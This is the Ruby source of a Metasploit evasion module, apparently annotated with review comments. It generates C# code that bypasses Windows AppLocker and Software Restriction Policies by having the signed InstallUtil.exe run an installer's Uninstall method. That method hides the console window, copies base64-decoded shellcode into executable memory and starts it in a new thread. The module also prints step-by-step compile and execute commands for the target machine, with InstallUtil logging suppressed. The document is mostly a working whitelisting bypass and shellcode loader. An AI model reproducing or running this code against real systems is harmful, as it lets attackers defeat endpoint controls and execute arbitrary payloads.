GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/applocker_evasion_install_util.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
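class MetasploitModule < Msf::Evasion

  # Number of distinct, randomly named C# identifiers the generated source needs.
  IDENTIFIER_COUNT = 12

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Applocker Evasion - .NET Framework Installation Utility',
      'Description' => %q(
        This module will assist you in evading Microsoft Windows
        Applocker and Software Restriction Policies.
        This technique utilises the Microsoft signed binary
        InstallUtil.exe to execute user supplied code.
      ),
      'Author' => [
        'Nick Tyrer <@NickTyrer>', # module development
        'Casey Smith' # install_util bypass research
      ],
      # NOTE(review): the page shows this as a string literal; other framework
      # modules use the MSF_LICENSE constant - confirm which is intended.
      'License' => 'MSF_LICENSE',
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [['Microsoft Windows', {}]],
      'References' => [
        # T1118 was retired by MITRE and folded into T1218.004 (Signed Binary
        # Proxy Execution: InstallUtil); both are kept so old cross-references resolve.
        ['URL', 'https://attack.mitre.org/techniques/T1118/'],
        ['URL', 'https://attack.mitre.org/techniques/T1218/004/']
      ]
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
    ])
  end

  # Base64 of the encoded payload. It is embedded as a string literal in the
  # generated C# source, so the shellcode is present in cleartext in the .txt
  # file and in the compiled .exe - no encryption or staging is done here.
  #
  # @return [String] base64-encoded payload bytes
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # One random 8-letter identifier. Letters only, so it is always a legal C#
  # identifier (collision with an 8-letter C# keyword is possible but negligible).
  #
  # @return [String]
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # `count` distinct random identifiers. Drawing them independently (as the
  # original did) could, rarely, yield duplicates and a non-compiling source.
  #
  # @param count [Integer] number of names wanted
  # @return [Array<String>]
  def obfu_names(count)
    names = []
    while names.size < count
      candidate = obfu
      names << candidate unless names.include?(candidate)
    end
    names
  end

  # Generates the C# source the operator compiles with csc.exe.
  #
  # What the generated program does:
  #   * Main() is an empty stub so csc.exe produces an executable; the real
  #     work is in an Installer subclass whose Uninstall() InstallUtil.exe
  #     calls when run with /U.
  #   * The console window is hidden (ShowWindow with SW_HIDE = 0).
  #   * VirtualAlloc(MEM_COMMIT = 0x1000, PAGE_EXECUTE_READWRITE = 0x40)
  #     creates an RWX region, the decoded shellcode is copied in, and
  #     CreateThread runs it; WaitForSingleObject(INFINITE = 0xFFFFFFFF)
  #     blocks until the thread exits. An RWX private allocation followed by
  #     a thread start is a well-known memory-scanner indicator.
  #
  # @return [String] C# source text
  def install_util
    esc = build_payload
    ns, stub, installer, commit, rwx, infinite, hwnd, sw_hide, b64, buf, addr, zero = obfu_names(IDENTIFIER_COUNT)
    <<~HEREDOC
      using System;
      namespace #{ns}
      {
        public class #{stub} { public static void Main() { } }
        [System.ComponentModel.RunInstaller(true)]
        public class #{installer} : System.Configuration.Install.Installer
        {
          private static Int32 #{commit}=0x1000;
          private static IntPtr #{rwx}=(IntPtr)0x40;
          private static UInt32 #{infinite} = 0xFFFFFFFF;
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
          [System.Runtime.InteropServices.DllImport("user32.dll")]
          static extern bool ShowWindow(IntPtr #{hwnd}, int nCmdShow);
          [System.Runtime.InteropServices.DllImport("Kernel32")]
          private static extern IntPtr GetConsoleWindow();
          const int #{sw_hide} = 0;
          public override void Uninstall(System.Collections.IDictionary s)
          {
            IntPtr #{hwnd};
            #{hwnd} = GetConsoleWindow();
            ShowWindow(#{hwnd}, #{sw_hide});
            string #{b64} = "#{esc}";
            byte[] #{buf} = Convert.FromBase64String(#{b64});
            IntPtr #{addr} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{buf}.Length, #{commit}, #{rwx});
            System.Runtime.InteropServices.Marshal.Copy(#{buf}, 0, #{addr}, #{buf}.Length);
            IntPtr #{zero} = IntPtr.Zero;
            WaitForSingleObject(CreateThread(#{zero}, UIntPtr.Zero, #{addr}, #{zero}, 0, ref #{zero}), #{infinite});
          }
        }
      }
    HEREDOC
  end

  # Msf::Evasion hook. With an argument it records the output filename; with
  # none it returns the recorded name (presumably consulted by file_create -
  # confirm against Msf::Evasion).
  #
  # @param name [String] filename to record, or '' to read
  # @return [String, nil]
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Output filename, always ending in .txt, derived from FILENAME without
  # mutating the datastore value (the original appended with `<<`, which
  # altered the datastore string in place, or raised if it was frozen).
  #
  # @return [String]
  def output_filename
    name = datastore['FILENAME'].to_s
    name = 'install_util.txt' if name.empty?
    name.downcase.end_with?('.txt') ? name : "#{name}.txt"
  end

  # Name the operator will give the compiled binary. Only a trailing .txt is
  # swapped, case-insensitively; the original gsub('.txt', '.exe') replaced
  # every occurrence and missed an upper-case extension.
  #
  # @return [String]
  def compiled_filename
    output_filename.sub(/\.txt\z/i, '.exe')
  end

  # Writes the generated C# source to disk under the computed filename.
  def create_files
    file_format_filename(output_filename)
    file_create(install_util)
  end

  # Prints the compile/run steps. The 32-/64-bit framework directory is
  # chosen from the payload architecture; the filenames printed are the ones
  # actually used, rather than the raw datastore value. `/logfile=` with
  # `/LogToConsole=false` keeps InstallUtil from writing its install log.
  def instructions
    src = output_filename
    exe = compiled_filename
    framework_dir = payload.arch.first == ARCH_X86 ? 'Framework' : 'Framework64'
    base = "C:\\Windows\\Microsoft.Net\\#{framework_dir}\\[.NET Version]"
    print_status "Copy #{src} to the target"
    print_status "Compile using: #{base}\\csc.exe /out:#{exe} #{src}"
    print_status "Execute using: #{base}\\InstallUtil.exe /logfile= /LogToConsole=false /U #{exe}"
  end

  # Module entry point: emit the source file, then tell the operator how to use it.
  def run
    create_files
    instructions
  end
end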